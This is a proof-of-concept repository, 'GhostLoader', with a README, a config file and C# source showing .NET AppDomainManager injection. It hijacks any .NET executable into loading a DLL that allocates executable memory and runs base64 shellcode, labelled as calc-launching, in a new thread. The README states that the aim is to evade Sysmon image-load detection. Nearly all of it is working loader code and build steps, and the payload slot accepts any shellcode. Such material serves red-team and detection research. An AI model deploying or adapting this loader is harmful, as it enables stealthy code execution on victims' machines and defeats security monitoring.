├── README.md
├── filehistory.exe.config
└── uevmonitor.cs


/README.md:
--------------------------------------------------------------------------------
 1 | # GhostLoader
 2 | GhostLoader - AppDomainManager - Injection - 攻壳机动队
 3 | 
 4 | 
 5 | 
 6 | GhostLoader Steps :)
 7 | 
 8 | 
 9 | ```
10 | 1. Create C:\Tools
11 | 2. Copy Some .NET, any .NET binary to C:\Tools
12 | 3. In this example, we use FileHistory.exe, but any .NET app will do.
13 | 4. Ensure FileHistory.exe.config is in the same path
14 | 5. Execute C:\Tools\FileHistory.exe
15 | 
16 | Does your tool/product detect/observe the Image Load Event?
17 | 
18 | The purpose of this example is to demonstrate a way to circumvent, tools that catch/prevent ImageLoad events.
19 | 
20 | ```
21 | 
22 | This should evade [Sysmon Event ID 7](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon#events)
23 | 
24 | ```
25 | Event ID 7: Image loaded
26 | The image loaded event logs when a module is loaded in a specific process. This event is disabled by default and needs to be 
27 | configured with the –l option. It indicates the process in which the module is loaded, hashes and signature information. The
28 | signature is created asynchronously for performance reasons and indicates if the file was removed after loading. This event
29 | should be configured carefully, as monitoring all image load events will generate a large number of events.
30 | ```
31 | 


--------------------------------------------------------------------------------
/filehistory.exe.config:
--------------------------------------------------------------------------------
1 | <configuration>
2 |    <runtime>
3 |       <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
4 |          <probing privatePath="C:\Tools"/>
5 |       </assemblyBinding> 
6 | 	  <appDomainManagerAssembly value="uevmonitor, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null" />  
7 | 	  <appDomainManagerType value="MyAppDomainManager" />  
8 |    </runtime>
9 | </configuration>


--------------------------------------------------------------------------------
/uevmonitor.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.EnterpriseServices;
 3 | using System.Runtime.InteropServices;
 4 | 
 5 | 
 6 | public sealed class MyAppDomainManager : AppDomainManager
 7 | {
 8 |   
 9 |     public override void InitializeNewDomain(AppDomainSetup appDomainInfo)
10 |     {
11 | 		//Set Break here, Dump Stack. You should be in System.AppDomain.CreateAppDomainManager();
12 | 		
13 | 		System.Windows.Forms.MessageBox.Show("AppDomain - KaBoomBeacon!");
14 | 		
15 | 		// You have more control here than I am demonstrating. For example, you can set ApplicationBase, 
16 | 		// Or you can Override the Assembly Resolver, etc...
17 | 		bool res = ClassExample.Execute();
18 | 		
19 |         return;
20 |     }
21 | }
22 | 
23 | public class ClassExample 
24 | {         
25 | 	//private static UInt32 MEM_COMMIT = 0x1000;          
26 | 	//private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;          
27 | 	
28 | 	[DllImport("kernel32")]
29 | 	private static extern IntPtr VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);          
30 | 	
31 | 	[DllImport("kernel32")]
32 | 	private static extern IntPtr CreateThread(            
33 | 	UInt32 lpThreadAttributes,
34 | 	UInt32 dwStackSize,
35 | 	IntPtr lpStartAddress,
36 | 	IntPtr param,
37 | 	UInt32 dwCreationFlags,
38 | 	ref UInt32 lpThreadId           
39 | 	);
40 | 	[DllImport("kernel32")]
41 | 	private static extern UInt32 WaitForSingleObject(           
42 | 	IntPtr hHandle,
43 | 	UInt32 dwMilliseconds
44 | 	);          
45 | 	public static bool Execute()
46 | 	{
47 | 	  // x64 Calc Shellcode Example
48 | 	  byte[] installercode = System.Convert.FromBase64String("/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu+AdKgpBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYwA=");
49 | 	  
50 | 	  IntPtr funcAddr = VirtualAlloc(0, (UInt32)installercode.Length, 0x1000, 0x40);
51 | 	  Marshal.Copy(installercode, 0, (IntPtr)(funcAddr), installercode.Length);
52 | 	  IntPtr hThread = IntPtr.Zero;
53 | 	  UInt32 threadId = 0;
54 | 	  IntPtr pinfo = IntPtr.Zero;
55 | 	  hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
56 | 	  WaitForSingleObject(hThread, 0xFFFFFFFF);
57 | 	  return true;
58 | 	} 
59 | }     
60 | 
61 | /*
62 | // uevmonitor.dll and path are _completely_ arbitrary here, so is the use of FileHistory.
63 | // This should work with any .NET app
64 | 
65 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:uevmonitor.dll type.cs
66 | set APPDOMAIN_MANAGER_ASM=uevmonitor, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
67 | set APPDOMAIN_MANAGER_TYPE=MyAppDomainManager
68 | set COMPLUS_Version=v4.0.30319
69 | 
70 | Or Config File
71 | 
72 | // Copy FileHistory.exe to C:\Tools\FileHistory.exe
73 | // Copy Config Below to C:\Tools\FileHistory.exe.config
74 | 
75 | 
76 | <configuration>
77 |    <runtime>
78 |       <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
79 |          <probing privatePath="C:\Tools"/>
80 |       </assemblyBinding> 
81 | 	  <appDomainManagerAssembly value="uevmonitor, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null" />  
82 | 	  <appDomainManagerType value="MyAppDomainManager" />  
83 |    </runtime>
84 | </configuration>
85 | 
86 | 
87 | 
88 | 
89 | */
90 | 
91 | 


--------------------------------------------------------------------------------